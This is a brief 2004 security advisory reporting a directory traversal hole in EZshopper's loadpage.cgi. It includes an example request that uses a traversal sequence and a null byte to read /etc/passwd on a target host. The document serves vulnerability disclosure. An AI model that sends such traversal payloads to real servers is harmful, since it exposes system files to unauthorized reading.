Product: EZshopper Versions: all URL: www.ahg.com Vulnerability: Directory Traversal Date: November 25, 2004 Discovered by: Zero X <Zero_X@xxxxxxxxxxxx> loadpage.cgi of EZshopper allows Directory Traversal Example: http://targethost/cgi-bin/loadpage.cgi?user_id=id&file=.|./.|./.|./.|./.|./etc/passwd%00.html - Zero X - http://www.excluded.org